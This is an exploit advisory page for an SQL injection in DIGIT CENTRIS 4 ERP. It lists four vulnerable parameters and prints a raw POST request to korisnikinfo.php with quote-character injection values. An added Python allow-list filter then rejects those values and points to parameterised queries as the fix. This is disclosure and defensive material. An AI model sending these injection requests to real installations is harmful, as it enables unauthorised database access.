DIGIT CENTRIS 4 ERP SQL Injection

2019.09.20
Credit: n1x_
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: DIGIT CENTRIS 4 ERP - 'datum1' SQL Injection
# Date: 2019-09-19
# Exploit Author: n1x_ [MS-WEB]
# Vendor Homepage: http://www.digit-rs.com/
# Product Homepage: http://digit-rs.com/centris.html
# Version: Every version
# CVE : N/A

# Vulnerable parameters: datum1, datum2, KID, PID

# [POST REQUEST]

POST /korisnikinfo.php HTTP/1.1
Content-Length: 65
Content-Type: application/x-www-form-urlencoded
Referer: http://host
Host: host
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

ListaPDF=Lista%20u%20PDF&datum1=1'"&datum2=01.01.2001'"&KID=1'"&PID=1'"
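Added example, not part of the original advisory or the vendor's code: an allow-list check for the four parameters the advisory names, of the kind a reverse proxy or request filter in front of /korisnikinfo.php could apply, run against the request body shown above. The value formats are assumptions: DD.MM.YYYY dates (inferred from the sample value 01.01.2001) and numeric KID/PID.

```python
import re
from urllib.parse import parse_qsl

# Assumed formats (not documented on the page): dates as DD.MM.YYYY,
# KID and PID as short unsigned integers.
DATE = re.compile(r"[0-9]{2}\.[0-9]{2}\.[0-9]{4}")
IDENT = re.compile(r"[0-9]{1,10}")
RULES = {"datum1": DATE, "datum2": DATE, "KID": IDENT, "PID": IDENT}


def rejected_params(body: str) -> list[str]:
    """Return the names of listed parameters whose values fail the allow-list.

    Every occurrence is checked, so a repeated parameter cannot hide a bad
    value behind a good one. Parameters outside RULES are ignored.
    """
    bad = []
    for name, value in parse_qsl(body, keep_blank_values=True):
        rule = RULES.get(name)
        if rule is not None and not rule.fullmatch(value):
            bad.append(name)
    return bad


# Request body exactly as printed in the advisory.
ADVISORY_BODY = (
    "ListaPDF=Lista%20u%20PDF&datum1=1'\"&datum2=01.01.2001'\""
    "&KID=1'\"&PID=1'\""
)
# Constructed sample of a well-formed request, for comparison.
BENIGN_BODY = (
    "ListaPDF=Lista%20u%20PDF&datum1=01.01.2001&datum2=31.12.2001"
    "&KID=1&PID=7"
)

if __name__ == "__main__":
    for label, body in (("advisory", ADVISORY_BODY), ("benign", BENIGN_BODY)):
        bad = rejected_params(body)
        print(label, "REJECT " + ",".join(bad) if bad else "ALLOW")
```

A filter like this only narrows what reaches the query; the fix in the application itself is to bind these values as query parameters instead of concatenating them into SQL.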



Copyright 2019, cxsecurity.com

 
